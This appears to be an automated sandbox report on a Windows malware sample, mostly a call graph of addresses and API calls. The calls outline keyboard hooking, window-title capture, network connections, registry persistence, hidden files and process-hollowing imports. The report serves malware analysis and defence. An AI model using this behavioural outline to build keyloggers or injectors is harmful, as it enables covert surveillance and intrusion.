47638 43993e 47268->47638 47272 41a737 47271->47272 47273 41a69c GetLocalTime 47271->47273 47275 401eea 26 API calls 47272->47275 47274 404cbf 28 API calls 47273->47274 47276 41a6de 47274->47276 47277 41a73f 47275->47277 47278 405ce6 28 API calls 47276->47278 47279 401eea 26 API calls 47277->47279 47280 41a6ea 47278->47280 47281 40ddaa 47279->47281 47672 4027cb 47280->47672 47281->46945 47283 41a6f6 47284 405ce6 28 API calls 47283->47284 47285 41a702 47284->47285 47675 406478 76 API calls 47285->47675 47287 41a710 47288 401eea 26 API calls 47287->47288 47289 41a71c 47288->47289 47290 401eea 26 API calls 47289->47290 47291 41a725 47290->47291 47292 401eea 26 API calls 47291->47292 47293 41a72e 47292->47293 47294 401eea 26 API calls 47293->47294 47294->47272 47296 409536 _wcslen 47295->47296 47297 409541 47296->47297 47298 409558 47296->47298 47299 40c89e 31 API calls 47297->47299 47300 40c89e 31 API calls 47298->47300 47301 409549 47299->47301 47302 409560 47300->47302 47303 401e18 26 API calls 47301->47303 47304 401e18 26 API calls 47302->47304 47305 409553 47303->47305 47306 40956e 47304->47306 47308 401e13 26 API calls 47305->47308 47307 401e13 26 API calls 47306->47307 47309 409576 47307->47309 47310 4095ad 47308->47310 47695 40856b 28 API calls 47309->47695 47680 409837 47310->47680 47313 409588 47696 4028cf 47313->47696 47316 409593 47317 401e18 26 API calls 47316->47317 47318 40959d 47317->47318 47319 401e13 26 API calls 47318->47319 47319->47305 47875 403b40 47320->47875 47324 41a7fd 47325 4028cf 28 API calls 47324->47325 47326 41a807 47325->47326 47327 401e13 26 API calls 47326->47327 47328 41a810 47327->47328 47329 401e13 26 API calls 47328->47329 47330 40dfc3 47329->47330 47330->46998 47332 41248f RegQueryValueExA RegCloseKey 47331->47332 47333 40e08b 47331->47333 47332->47333 47333->47027 47333->47030 47335 4125b0 RegQueryValueExW RegCloseKey 47334->47335 47336 4125dd 47334->47336 47335->47336 47337 403b40 28 API calls 47336->47337 47338 40e0ba 47337->47338 47338->47039 47340 412992 RegDeleteValueW 47339->47340 47341 4129a6 47339->47341 47340->47341 47342 4129a2 47340->47342 47341->47048 47342->47048 47344 40cbc5 47343->47344 47345 41246e 3 API calls 47344->47345 47346 40cbcc 47345->47346 47350 40cbeb 47346->47350 47897 401602 47346->47897 47348 40cbd9 47900 4127d5 RegCreateKeyA 47348->47900 47351 413fd4 47350->47351 47352 413feb 47351->47352 47917 41aa73 47352->47917 47354 413ff6 47355 401d64 28 API calls 47354->47355 47356 41400f 47355->47356 47357 43a5e7 _strftime 42 API calls 47356->47357 47358 41401c 47357->47358 47359 414021 Sleep 47358->47359 47360 41402e 47358->47360 47359->47360 47361 401f66 28 API calls 47360->47361 47362 41403d 47361->47362 47363 401d64 28 API calls 47362->47363 47364 41404b 47363->47364 47365 401fbd 28 API calls 47364->47365 47366 414053 47365->47366 47367 41afc3 28 API calls 47366->47367 47368 41405b 47367->47368 47921 404262 WSAStartup 47368->47921 47370 414065 47371 401d64 28 API calls 47370->47371 47372 41406e 47371->47372 47373 401d64 28 API calls 47372->47373 47420 4140ed 47372->47420 47374 414087 47373->47374 47375 401d64 28 API calls 47374->47375 47377 414098 47375->47377 47376 401fbd 28 API calls 47376->47420 47379 401d64 28 API calls 47377->47379 47378 41afc3 28 API calls 47378->47420 47380 4140a9 47379->47380 47383 401d64 28 API calls 47380->47383 47381 401d64 28 API calls 47381->47420 47382 4085b4 28 API calls 47382->47420 47384 4140ba 47383->47384 47385 401d64 28 API calls 47384->47385 47387 4140cb 47385->47387 47386 401eef 26 API calls 47386->47420 47389 401d64 28 API calls 47387->47389 47388 401eea 26 API calls 47388->47420 47390 4140dd 47389->47390 48055 404101 87 API calls 47390->48055 47393 414244 WSAGetLastError 48056 41bc76 30 API calls 47393->48056 47397 401f66 28 API calls 47443 414259 47397->47443 47401 404cbf 28 API calls 47401->47420 47402 401d64 28 API calls 47402->47443 47403 401d8c 26 API calls 47403->47443 47404 43a5e7 _strftime 42 API calls 47406 414b80 Sleep 47404->47406 47405 405ce6 28 API calls 47405->47420 47406->47443 47407 4027cb 28 API calls 47407->47420 47408 401f66 28 API calls 47408->47420 47409 41a686 79 API calls 47409->47420 47412 4082dc 28 API calls 47412->47420 47413 440c51 26 API calls 47413->47420 47414 41265d 3 API calls 47414->47420 47415 412513 31 API calls 47415->47420 47416 403b40 28 API calls 47416->47420 47420->47376 47420->47378 47420->47381 47420->47382 47420->47386 47420->47388 47420->47393 47420->47401 47420->47405 47420->47407 47420->47408 47420->47409 47420->47412 47420->47413 47420->47414 47420->47415 47420->47416 47421 41ad46 28 API calls 47420->47421 47422 401d64 28 API calls 47420->47422 47420->47443 47922 413f9a 47420->47922 47927 4041f1 47420->47927 47934 404915 47420->47934 47949 40428c connect 47420->47949 48009 41a96d 47420->48009 48012 413683 47420->48012 48015 40cbf1 47420->48015 48021 41adee 47420->48021 48024 41aec8 47420->48024 47421->47420 47423 4144ed GetTickCount 47422->47423 47424 41ad46 28 API calls 47423->47424 47437 414507 47424->47437 47426 41ad46 28 API calls 47426->47437 47429 41aec8 28 API calls 47429->47437 47431 405ce6 28 API calls 47431->47437 47432 40275c 28 API calls 47432->47437 47433 4027cb 28 API calls 47433->47437 47435 401eea 26 API calls 47435->47437 47436 401e13 26 API calls 47436->47437 47437->47426 47437->47429 47437->47431 47437->47432 47437->47433 47437->47435 47437->47436 48028 41aca0 47437->48028 48030 41ac52 47437->48030 48035 40e679 GetLocaleInfoA 47437->48035 48038 4027ec 28 API calls 47437->48038 48039 4045d5 47437->48039 48058 404468 60 API calls _Yarn 47437->48058 47440 41a686 79 API calls 47440->47443 47441 414b22 CreateThread 47441->47443 48208 419e89 103 API calls 47441->48208 47442 401eea 26 API calls 47442->47443 47443->47397 47443->47402 47443->47403 47443->47404 47443->47420 47443->47440 47443->47441 47443->47442 47444 401e13 26 API calls 47443->47444 48057 404c9e 28 API calls 47443->48057 48059 40a767 84 API calls 47443->48059 48060 4047eb 98 API calls 47443->48060 47444->47443 47445->46798 47446->46808 47449 4085c0 47448->47449 47450 402e78 28 API calls 47449->47450 47451 4085e4 47450->47451 47451->46829 47453 4124e1 RegQueryValueExA RegCloseKey 47452->47453 47454 41250b 47452->47454 47453->47454 47454->46825 47455->46832 47456->46861 47457->46854 47458->46845 47459->46859 47461 40c8ba 47460->47461 47462 40c8da 47461->47462 47463 40c90f 47461->47463 47465 40c8d0 47461->47465 48209 41a74b 29 API calls 47462->48209 47464 41b15b GetCurrentProcess 47463->47464 47468 40c914 47464->47468 47467 40ca03 GetLongPathNameW 47465->47467 47470 403b40 28 API calls 47467->47470 47471 40c918 47468->47471 47472 40c96a 47468->47472 47469 40c8e3 47473 401e18 26 API calls 47469->47473 47474 40ca18 47470->47474 47477 403b40 28 API calls 47471->47477 47476 403b40 28 API calls 47472->47476 47478 40c8ed 47473->47478 47475 403b40 28 API calls 47474->47475 47479 40ca27 47475->47479 47480 40c978 47476->47480 47481 40c926 47477->47481 47483 401e13 26 API calls 47478->47483 48212 40cc37 28 API calls 47479->48212 47486 403b40 28 API calls 47480->47486 47487 403b40 28 API calls 47481->47487 47483->47465 47484 40ca3a 48213 402860 28 API calls 47484->48213 47489 40c98e 47486->47489 47490 40c93c 47487->47490 47488 40ca45 48214 402860 28 API calls 47488->48214 48211 402860 28 API calls 47489->48211 48210 402860 28 API calls 47490->48210 47494 40ca4f 47497 401e13 26 API calls 47494->47497 47495 40c999 47498 401e18 26 API calls 47495->47498 47496 40c947 47499 401e18 26 API calls 47496->47499 47500 40ca59 47497->47500 47501 40c9a4 47498->47501 47502 40c952 47499->47502 47503 401e13 26 API calls 47500->47503 47504 401e13 26 API calls 47501->47504 47505 401e13 26 API calls 47502->47505 47506 40ca62 47503->47506 47507 40c9ad 47504->47507 47508 40c95b 47505->47508 47509 401e13 26 API calls 47506->47509 47510 401e13 26 API calls 47507->47510 47511 401e13 26 API calls 47508->47511 47512 40ca6b 47509->47512 47510->47478 47511->47478 47513 401e13 26 API calls 47512->47513 47514 40ca74 47513->47514 47515 401e13 26 API calls 47514->47515 47516 40ca7d 47515->47516 47516->46907 47517->46919 47518->46941 47520 412683 RegQueryValueExA RegCloseKey 47519->47520 47521 4126a7 47519->47521 47520->47521 47521->46900 47522->46933 47523->46969 47524->46979 47525->47003 47526->46991 47527->47024 47529 401e0c 47528->47529 47530->46852 47533 40e183 47532->47533 47534 41a65c LoadResource LockResource SizeofResource 47532->47534 47533->47154 47534->47533 47536 401f86 28 API calls 47535->47536 47537 406066 47536->47537 47537->47165 47548 403c30 47538->47548 47542 41bfae 47541->47542 47543 41bfcb 47542->47543 47545 41bfd2 47542->47545 47583 41bfe3 28 API calls 47543->47583 47564 41c552 47545->47564 47546 41bfd0 47546->47186 47549 403c39 47548->47549 47552 403c59 47549->47552 47553 403c68 47552->47553 47558 4032a4 47553->47558 47555 403c74 47556 402325 28 API calls 47555->47556 47557 403b73 47556->47557 47557->47186 47559 4032b0 47558->47559 47560 4032ad 47558->47560 47563 4032b6 28 API calls 47559->47563 47560->47555 47565 41c55c __EH_prolog 47564->47565 47566 41c673 47565->47566 47567 41c595 47565->47567 47590 402649 28 API calls std::_Xinvalid_argument 47566->47590 47584 4026a7 28 API calls 47567->47584 47571 41c5a9 47585 41c536 28 API calls 47571->47585 47573 41c5dc 47574 41c603 47573->47574 47575 41c5f7 47573->47575 47587 41c7cf 26 API calls 47574->47587 47586 41c7b2 26 API calls 47575->47586 47578 41c601 47589 41c75a 26 API calls 47578->47589 47579 41c60f 47588 41c7cf 26 API calls 47579->47588 47582 41c63e 47582->47546 47583->47546 47584->47571 47585->47573 47586->47578 47587->47579 47588->47578 47589->47582 47591->47190 47594 402e85 47593->47594 47595 402ea9 47594->47595 47596 402e98 47594->47596 47598 402eae 47594->47598 47595->47199 47600 403445 28 API calls 47596->47600 47598->47595 47601 40225b 26 API calls 47598->47601 47600->47595 47601->47595 47603 404bd0 47602->47603 47606 40245c 47603->47606 47605 404be4 47605->47202 47607 402469 47606->47607 47608 402478 47607->47608 47610 402ad3 28 API calls 47607->47610 47608->47605 47610->47608 47611->47206 47613 401e94 47612->47613 47615 41a471 47614->47615 47616 41b168 GetCurrentProcess 47614->47616 47617 412513 RegOpenKeyExA 47615->47617 47616->47615 47618 412541 RegQueryValueExA RegCloseKey 47617->47618 47619 412569 47617->47619 47618->47619 47620 401f66 28 API calls 47619->47620 47621 41257e 47620->47621 47621->47219 47622->47227 47624 40b02f 47623->47624 47627 40b04b 47624->47627 47626 40b045 47626->47238 47628 40b055 47627->47628 47630 40b060 47628->47630 47631 40b138 28 API calls 47628->47631 47630->47626 47631->47630 47632->47242 47633->47245 47635 40230d 47634->47635 47636 402325 28 API calls 47635->47636 47637 401f80 47636->47637 47637->46912 47656 43a545 47638->47656 47640 43998b 47665 4392de 38 API calls 3 library calls 47640->47665 47641 439950 47641->47640 47642 439965 47641->47642 47655 40dd54 47641->47655 47663 445354 20 API calls _abort 47642->47663 47645 43996a 47664 43a827 26 API calls _Deallocate 47645->47664 47648 439997 47649 4399c6 47648->47649 47666 43a58a 42 API calls __Toupper 47648->47666 47650 439a32 47649->47650 47667 43a4f1 26 API calls 2 library calls 47649->47667 47668 43a4f1 26 API calls 2 library calls 47650->47668 47653 439af9 _strftime 47653->47655 47669 445354 20 API calls _abort 47653->47669 47655->46928 47655->46929 47657 43a54a 47656->47657 47658 43a55d 47656->47658 47670 445354 20 API calls _abort 47657->47670 47658->47641 47660 43a54f 47671 43a827 26 API calls _Deallocate 47660->47671 47662 43a55a 47662->47641 47663->47645 47664->47655 47665->47648 47666->47648 47667->47650 47668->47653 47669->47655 47670->47660 47671->47662 47676 401e9b 47672->47676 47674 4027d9 47674->47283 47675->47287 47677 401ea7 47676->47677 47678 40245c 28 API calls 47677->47678 47679 401eb9 47678->47679 47679->47674 47681 409855 47680->47681 47682 4124b7 3 API calls 47681->47682 47683 40985c 47682->47683 47684 409870 47683->47684 47685 40988a 47683->47685 47687 4095cf 47684->47687 47688 409875 47684->47688 47699 4082dc 47685->47699 47687->46964 47689 4082dc 28 API calls 47688->47689 47691 409883 47689->47691 47725 409959 29 API calls 47691->47725 47694 409888 47694->47687 47695->47313 47866 402d8b 47696->47866 47698 4028dd 47698->47316 47700 4082eb 47699->47700 47726 408431 47700->47726 47702 408309 47703 4098a5 47702->47703 47731 40affa 47703->47731 47706 4098f6 47708 401f66 28 API calls 47706->47708 47707 4098ce 47709 401f66 28 API calls 47707->47709 47710 409901 47708->47710 47711 4098d8 47709->47711 47713 401f66 28 API calls 47710->47713 47712 41ae08 28 API calls 47711->47712 47714 4098e6 47712->47714 47715 409910 47713->47715 47735 40a876 31 API calls _Yarn 47714->47735 47717 41a686 79 API calls 47715->47717 47719 409915 CreateThread 47717->47719 47718 4098ed 47720 401eea 26 API calls 47718->47720 47721 409930 CreateThread 47719->47721 47722 40993c CreateThread 47719->47722 47747 4099a9 47719->47747 47720->47706 47721->47722 47744 409993 47721->47744 47723 401e13 26 API calls 47722->47723 47741 4099b5 47722->47741 47724 409950 47723->47724 47724->47687 47725->47694 47865 40999f 135 API calls 47725->47865 47727 40843d 47726->47727 47728 40845b 47727->47728 47730 402f0d 28 API calls 47727->47730 47728->47702 47730->47728 47733 40b006 47731->47733 47732 4098c3 47732->47706 47732->47707 47733->47732 47736 403b9e 47733->47736 47735->47718 47737 403ba8 47736->47737 47739 403bb3 47737->47739 47740 403cfd 28 API calls 47737->47740 47739->47732 47740->47739 47750 40a3f4 47741->47750 47799 4099e4 47744->47799 47820 409e48 47747->47820 47777 40a402 47750->47777 47751 4099be 47752 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47753 40b027 28 API calls 47752->47753 47753->47777 47756 41aca0 GetTickCount 47756->47777 47758 40a4a2 GetWindowTextW 47758->47777 47760 401e13 26 API calls 47760->47777 47761 40a5ff 47763 401e13 26 API calls 47761->47763 47762 40affa 28 API calls 47762->47777 47763->47751 47764 40a569 Sleep 47764->47777 47767 401f66 28 API calls 47767->47777 47768 40a4f1 47770 4082dc 28 API calls 47768->47770 47768->47777 47783 40a876 31 API calls _Yarn 47768->47783 47770->47768 47772 405ce6 28 API calls 47772->47777 47774 4028cf 28 API calls 47774->47777 47775 41ae08 28 API calls 47775->47777 47776 409d58 27 API calls 47776->47777 47777->47751 47777->47752 47777->47756 47777->47758 47777->47760 47777->47761 47777->47762 47777->47764 47777->47767 47777->47768 47777->47772 47777->47774 47777->47775 47777->47776 47778 401eea 26 API calls 47777->47778 47779 433519 5 API calls __Init_thread_wait 47777->47779 47780 4338a5 29 API calls __onexit 47777->47780 47781 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47777->47781 47782 4082a8 28 API calls 47777->47782 47784 40b0dd 28 API calls 47777->47784 47785 40ae58 44 API calls 2 library calls 47777->47785 47786 440c51 47777->47786 47790 404c9e 28 API calls 47777->47790 47778->47777 47779->47777 47780->47777 47781->47777 47782->47777 47783->47768 47784->47777 47785->47777 47787 440c5d 47786->47787 47791 440a4d 47787->47791 47790->47777 47792 440a64 47791->47792 47796 440aa5 47792->47796 47797 445354 20 API calls _abort 47792->47797 47794 440a9b 47798 43a827 26 API calls _Deallocate 47794->47798 47796->47777 47797->47794 47798->47796 47800 409a63 GetMessageA 47799->47800 47801 4099ff GetModuleHandleA SetWindowsHookExA 47799->47801 47802 409a75 TranslateMessage DispatchMessageA 47800->47802 47803 40999c 47800->47803 47801->47800 47804 409a1b GetLastError 47801->47804 47802->47800 47802->47803 47814 41ad46 47804->47814 47808 409a3e 47809 401f66 28 API calls 47808->47809 47810 409a4d 47809->47810 47811 41a686 79 API calls 47810->47811 47812 409a52 47811->47812 47813 401eea 26 API calls 47812->47813 47813->47803 47815 440c51 26 API calls 47814->47815 47816 41ad67 47815->47816 47817 401f66 28 API calls 47816->47817 47818 409a31 47817->47818 47819 404c9e 28 API calls 47818->47819 47819->47808 47821 409e5d Sleep 47820->47821 47840 409d97 47821->47840 47823 4099b2 47824 409e9d CreateDirectoryW 47828 409e6f 47824->47828 47825 409eae GetFileAttributesW 47825->47828 47826 409ec5 SetFileAttributesW 47826->47828 47828->47821 47828->47823 47828->47824 47828->47825 47828->47826 47830 401d64 28 API calls 47828->47830 47838 409f10 47828->47838 47853 41b58f 47828->47853 47829 409f3f PathFileExistsW 47829->47838 47830->47828 47831 401f86 28 API calls 47831->47838 47833 40a048 SetFileAttributesW 47833->47828 47834 406052 28 API calls 47834->47838 47835 401eef 26 API calls 47835->47838 47836 401eea 26 API calls 47836->47838 47838->47829 47838->47831 47838->47833 47838->47834 47838->47835 47838->47836 47839 401eea 26 API calls 47838->47839 47862 41b61a 32 API calls 47838->47862 47863 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47838->47863 47839->47828 47841 409e44 47840->47841 47846 409dad 47840->47846 47841->47828 47842 409dcc CreateFileW 47843 409dda GetFileSize 47842->47843 47842->47846 47844 409e0f CloseHandle 47843->47844 47843->47846 47844->47846 47845 409e21 47845->47841 47850 4082dc 28 API calls 47845->47850 47846->47842 47846->47844 47846->47845 47847 409e04 Sleep 47846->47847 47848 409dfd 47846->47848 47847->47844 47864 40a7f0 83 API calls 47848->47864 47851 409e3d 47850->47851 47852 4098a5 126 API calls 47851->47852 47852->47841 47854 41b5a2 CreateFileW 47853->47854 47856 41b5db 47854->47856 47857 41b5df 47854->47857 47856->47828 47858 41b5f6 WriteFile 47857->47858 47859 41b5e6 SetFilePointer 47857->47859 47860 41b609 47858->47860 47861 41b60b CloseHandle 47858->47861 47859->47858 47859->47861 47860->47861 47861->47856 47862->47838 47863->47838 47864->47847 47867 402d97 47866->47867 47870 4030f7 47867->47870 47869 402dab 47869->47698 47871 403101 47870->47871 47873 403115 47871->47873 47874 4036c2 28 API calls 47871->47874 47873->47869 47874->47873 47876 403b48 47875->47876 47882 403b7a 47876->47882 47879 403cbb 47886 403dc2 47879->47886 47881 403cc9 47881->47324 47883 403b86 47882->47883 47884 403b9e 28 API calls 47883->47884 47885 403b5a 47884->47885 47885->47879 47887 403dce 47886->47887 47890 402ffd 47887->47890 47889 403de3 47889->47881 47891 40300e 47890->47891 47892 4032a4 28 API calls 47891->47892 47893 40301a 47892->47893 47895 40302e 47893->47895 47896 4035e8 28 API calls 47893->47896 47895->47889 47896->47895 47903 4395ba 47897->47903 47901 412814 47900->47901 47902 4127ed RegSetValueExA RegCloseKey 47900->47902 47901->47350 47902->47901 47906 43953b 47903->47906 47905 401608 47905->47348 47907 43954a 47906->47907 47908 43955e 47906->47908 47914 445354 20 API calls _abort 47907->47914 47913 43955a __alldvrm 47908->47913 47916 447601 11 API calls 2 library calls 47908->47916 47910 43954f 47915 43a827 26 API calls _Deallocate 47910->47915 47913->47905 47914->47910 47915->47913 47916->47913 47920 41aab9 _Yarn ___scrt_fastfail 47917->47920 47918 401f66 28 API calls 47919 41ab2e 47918->47919 47919->47354 47920->47918 47921->47370 47923 413fb3 getaddrinfo WSASetLastError 47922->47923 47924 413fa9 47922->47924 47923->47420 48061 413e37 35 API calls ___std_exception_copy 47924->48061 47926 413fae 47926->47923 47928 404206 socket 47927->47928 47929 4041fd 47927->47929 47931 404220 47928->47931 47932 404224 CreateEventW 47928->47932 48062 404262 WSAStartup 47929->48062 47931->47420 47932->47420 47933 404202 47933->47928 47933->47931 47935 4049b1 47934->47935 47936 40492a 47934->47936 47935->47420 47937 404933 47936->47937 47938 404987 CreateEventA CreateThread 47936->47938 47939 404942 GetLocalTime 47936->47939 47937->47938 47938->47935 48064 404b1d 47938->48064 47940 41ad46 28 API calls 47939->47940 47941 40495b 47940->47941 48063 404c9e 28 API calls 47941->48063 47943 404968 47944 401f66 28 API calls 47943->47944 47945 404977 47944->47945 47946 41a686 79 API calls 47945->47946 47947 40497c 47946->47947 47948 401eea 26 API calls 47947->47948 47948->47938 47950 4043e1 47949->47950 47951 4042b3 47949->47951 47952 404343 47950->47952 47953 4043e7 WSAGetLastError 47950->47953 47951->47952 47954 4042e8 47951->47954 47957 404cbf 28 API calls 47951->47957 47952->47420 47953->47952 47955 4043f7 47953->47955 48068 420151 27 API calls 47954->48068 47958 4042f7 47955->47958 47959 4043fc 47955->47959 47961 4042d4 47957->47961 47964 401f66 28 API calls 47958->47964 48073 41bc76 30 API calls 47959->48073 47960 4042f0 47960->47958 47963 404306 47960->47963 47965 401f66 28 API calls 47961->47965 47974 404315 47963->47974 47975 40434c 47963->47975 47968 404448 47964->47968 47969 4042e3 47965->47969 47966 40440b 48074 404c9e 28 API calls 47966->48074 47971 401f66 28 API calls 47968->47971 47972 41a686 79 API calls 47969->47972 47970 404418 47973 401f66 28 API calls 47970->47973 47976 404457 47971->47976 47972->47954 47977 404427 47973->47977 47979 401f66 28 API calls 47974->47979 48070 420f34 56 API calls 47975->48070 47980 41a686 79 API calls 47976->47980 47981 41a686 79 API calls 47977->47981 47983 404324 47979->47983 47980->47952 47984 40442c 47981->47984 47982 404354 47985 404389 47982->47985 47986 404359 47982->47986 47987 401f66 28 API calls 47983->47987 47988 401eea 26 API calls 47984->47988 48072 4202ea 28 API calls 47985->48072 47989 401f66 28 API calls 47986->47989 47990 404333 47987->47990 47988->47952 47993 404368 47989->47993 47994 41a686 79 API calls 47990->47994 47992 404391 47995 4043be CreateEventW CreateEventW 47992->47995 47997 401f66 28 API calls 47992->47997 47996 401f66 28 API calls 47993->47996 48007 404338 47994->48007 47995->47952 47998 404377 47996->47998 48000 4043a7 47997->48000 48001 41a686 79 API calls 47998->48001 48002 401f66 28 API calls 48000->48002 48003 40437c 48001->48003 48004 4043b6 48002->48004 48071 420592 54 API calls 48003->48071 48006 41a686 79 API calls 48004->48006 48008 4043bb 48006->48008 48069 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48007->48069 48008->47995 48075 41a945 GlobalMemoryStatusEx 48009->48075 48011 41a982 48011->47420 48076 413646 48012->48076 48016 40cc0d 48015->48016 48017 41246e 3 API calls 48016->48017 48019 40cc14 48017->48019 48018 40cc2c 48018->47420 48019->48018 48020 4124b7 3 API calls 48019->48020 48020->48018 48022 401f86 28 API calls 48021->48022 48023 41ae03 48022->48023 48023->47420 48025 41aed5 48024->48025 48026 401f86 28 API calls 48025->48026 48027 41aee7 48026->48027 48027->47420 48029 41acb6 GetTickCount 48028->48029 48029->47437 48031 436050 ___scrt_fastfail 48030->48031 48032 41ac71 GetForegroundWindow GetWindowTextW 48031->48032 48033 403b40 28 API calls 48032->48033 48034 41ac9b 48033->48034 48034->47437 48036 401f66 28 API calls 48035->48036 48037 40e69e 48036->48037 48037->47437 48038->47437 48051 4045ec 48039->48051 48040 43a88c _Yarn 21 API calls 48040->48051 48042 40465b 48044 404666 48042->48044 48042->48051 48043 401f86 28 API calls 48043->48051 48121 4047eb 98 API calls 48044->48121 48045 401eef 26 API calls 48045->48051 48047 40466d 48049 401eea 26 API calls 48047->48049 48048 401eea 26 API calls 48048->48051 48050 404676 48049->48050 48052 401eea 26 API calls 48050->48052 48051->48040 48051->48042 48051->48043 48051->48045 48051->48048 48109 404688 48051->48109 48120 40455b 59 API calls 48051->48120 48053 40467f 48052->48053 48053->47443 48055->47420 48056->47443 48057->47443 48058->47437 48059->47443 48060->47443 48061->47926 48062->47933 48063->47943 48067 404b29 101 API calls 48064->48067 48066 404b26 48067->48066 48068->47960 48069->47952 48070->47982 48071->48007 48072->47992 48073->47966 48074->47970 48075->48011 48079 413619 48076->48079 48080 41362e ___scrt_initialize_default_local_stdio_options 48079->48080 48083 43e2dd 48080->48083 48086 43b030 48083->48086 48087 43b070 48086->48087 48088 43b058 48086->48088 48087->48088 48090 43b078 48087->48090 48103 445354 20 API calls _abort 48088->48103 48105 4392de 38 API calls 3 library calls 48090->48105 48091 43b05d 48104 43a827 26 API calls _Deallocate 48091->48104 48094 43b088 48106 43b7b6 20 API calls 2 library calls 48094->48106 48095 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48097 41363c 48095->48097 48097->47420 48098 43b100 48107 43be24 50 API calls 3 library calls 48098->48107 48100 43b10b 48108 43b820 20 API calls _free 48100->48108 48102 43b068 48102->48095 48103->48091 48104->48102 48105->48094 48106->48098 48107->48100 48108->48102 48115 4046a3 48109->48115 48110 4047d8 48111 401eea 26 API calls 48110->48111 48112 4047e1 48111->48112 48112->48042 48113 403b60 28 API calls 48113->48115 48114 401eef 26 API calls 48114->48115 48115->48110 48115->48113 48115->48114 48116 401eea 26 API calls 48115->48116 48117 401ebd 28 API calls 48115->48117 48118 401fbd 28 API calls 48115->48118 48116->48115 48119 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 48117->48119 48118->48115 48119->48115 48122 414b9b 48119->48122 48120->48051 48121->48047 48123 401fbd 28 API calls 48122->48123 48124 414bbd SetEvent 48123->48124 48125 414bd2 48124->48125 48126 403b60 28 API calls 48125->48126 48127 414bec 48126->48127 48128 401fbd 28 API calls 48127->48128 48129 414bfc 48128->48129 48130 401fbd 28 API calls 48129->48130 48131 414c0e 48130->48131 48132 41afc3 28 API calls 48131->48132 48133 414c17 48132->48133 48134 4161f2 48133->48134 48136 414de3 48133->48136 48137 414c37 GetTickCount 48133->48137 48135 401d8c 26 API calls 48134->48135 48138 4161fb 48135->48138 48136->48134 48196 414d99 48136->48196 48139 41ad46 28 API calls 48137->48139 48140 401eea 26 API calls 48138->48140 48141 414c4d 48139->48141 48144 416207 48140->48144 48145 41aca0 GetTickCount 48141->48145 48143 414d7d 48143->48134 48147 401eea 26 API calls 48144->48147 48146 414c54 48145->48146 48148 41ad46 28 API calls 48146->48148 48149 416213 48147->48149 48150 414c5f 48148->48150 48151 41ac52 30 API calls 48150->48151 48152 414c6d 48151->48152 48153 41aec8 28 API calls 48152->48153 48154 414c7b 48153->48154 48155 401d64 28 API calls 48154->48155 48156 414c89 48155->48156 48201 4027ec 28 API calls 48156->48201 48158 414c97 48202 40275c 28 API calls 48158->48202 48160 414ca6 48161 4027cb 28 API calls 48160->48161 48162 414cb5 48161->48162 48203 40275c 28 API calls 48162->48203 48164 414cc4 48165 4027cb 28 API calls 48164->48165 48166 414cd0 48165->48166 48204 40275c 28 API calls 48166->48204 48168 414cda 48205 404468 60 API calls _Yarn 48168->48205 48170 414ce9 48171 401eea 26 API calls 48170->48171 48172 414cf2 48171->48172 48173 401eea 26 API calls 48172->48173 48174 414cfe 48173->48174 48175 401eea 26 API calls 48174->48175 48176 414d0a 48175->48176 48177 401eea 26 API calls 48176->48177 48178 414d16 48177->48178 48179 401eea 26 API calls 48178->48179 48180 414d22 48179->48180 48181 401eea 26 API calls 48180->48181 48182 414d2e 48181->48182 48183 401e13 26 API calls 48182->48183 48184 414d3a 48183->48184 48185 401eea 26 API calls 48184->48185 48186 414d43 48185->48186 48187 401eea 26 API calls 48186->48187 48188 414d4c 48187->48188 48189 401d64 28 API calls 48188->48189 48190 414d57 48189->48190 48191 43a5e7 _strftime 42 API calls 48190->48191 48192 414d64 48191->48192 48193 414d69 48192->48193 48194 414d8f 48192->48194 48197 414d82 48193->48197 48198 414d77 48193->48198 48195 401d64 28 API calls 48194->48195 48195->48196 48196->48134 48207 404ab1 83 API calls 48196->48207 48200 404915 104 API calls 48197->48200 48206 4049ba 81 API calls 48198->48206 48200->48143 48201->48158 48202->48160 48203->48164 48204->48168 48205->48170 48206->48143 48207->48143 48209->47469 48210->47496 48211->47495 48212->47484 48213->47488 48214->47494 48216 40e56a 48215->48216 48217 4124b7 3 API calls 48216->48217 48219 40e60e 48216->48219 48221 40e5fe Sleep 48216->48221 48237 40e59c 48216->48237 48217->48216 48218 4082dc 28 API calls 48218->48237 48220 4082dc 28 API calls 48219->48220 48223 40e619 48220->48223 48221->48216 48222 41ae08 28 API calls 48222->48237 48225 41ae08 28 API calls 48223->48225 48226 40e625 48225->48226 48250 412774 29 API calls 48226->48250 48229 401e13 26 API calls 48229->48237 48230 40e638 48231 401e13 26 API calls 48230->48231 48233 40e644 48231->48233 48232 401f66 28 API calls 48232->48237 48234 401f66 28 API calls 48233->48234 48235 40e655 48234->48235 48238 4126d2 29 API calls 48235->48238 48236 4126d2 29 API calls 48236->48237 48237->48218 48237->48221 48237->48222 48237->48229 48237->48232 48237->48236 48248 40bf04 73 API calls ___scrt_fastfail 48237->48248 48249 412774 29 API calls 48237->48249 48239 40e668 48238->48239 48251 411699 TerminateProcess WaitForSingleObject 48239->48251 48241 40e670 ExitProcess 48252 411637 61 API calls 48243->48252 48249->48237 48250->48230 48251->48241

                                                                                                        Executed Functions

                                                                                                        Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
